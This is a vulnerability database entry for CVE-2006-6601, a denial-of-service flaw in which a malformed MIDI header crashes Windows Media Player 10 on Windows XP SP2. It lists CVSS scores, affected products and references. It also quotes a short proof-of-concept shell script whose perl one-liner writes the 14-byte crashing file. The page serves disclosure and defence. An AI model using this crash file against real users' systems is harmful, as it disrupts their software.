Published: 15/12/2006 Updated: 17/10/2018

CVSS v2 Base Score: 4.3 | Impact Score: 2.9 | Exploitability Score: 8.6

VMScore: 440

Vector: AV:N/AC:M/Au:N/C:N/I:N/A:P

Windows Media Player 10.00.00.4036 in Microsoft Windows XP SP2 allows user-assisted remote malicious users to cause a denial of service via a .MID (MIDI) file with a malformed header chunk without any track chunks, possibly involving (1) number of tracks of (2) time division fields that are set to 0.

Vulnerable Product	Search on Vulmon	Subscribe to Product
windows media_player 10.00.00.4036
microsoft windows_xp

#!/bin/sh # Windows Media MID File Denial Of Service Vulnerability # Tested: # Windows Media 1000004036 # Windows XP SP2 # file "examplemid" (Hex-Code): # 4D 54 68 64 00 00 00 06 00 00 00 00 00 00 # File size = 14 byte perl -e 'print "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00"' > examplemid # milw0rmcom [2006-12-15] ...

source: wwwsecurityfocuscom/bid/21612/info Multiple applications are prone to a denial-of-service vulnerability A remote attacker may exploit this vulnerability by presenting malicious 'WMV', 'MID', and 'AVI' files to a victim user When an affected application processes this image, the application crashes, effectively denying service ...

CWE-399 http://www.attrition.org/pipermail/vim/2006-December/001182.html http://www.securityfocus.com/bid/21612 http://www.vupen.com/english/advisories/2006/5039 http://www.securityfocus.com/archive/1/454505/100/0/threaded https://nvd.nist.gov https://www.exploit-db.com/exploits/2935/

CVE-2006-6601

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect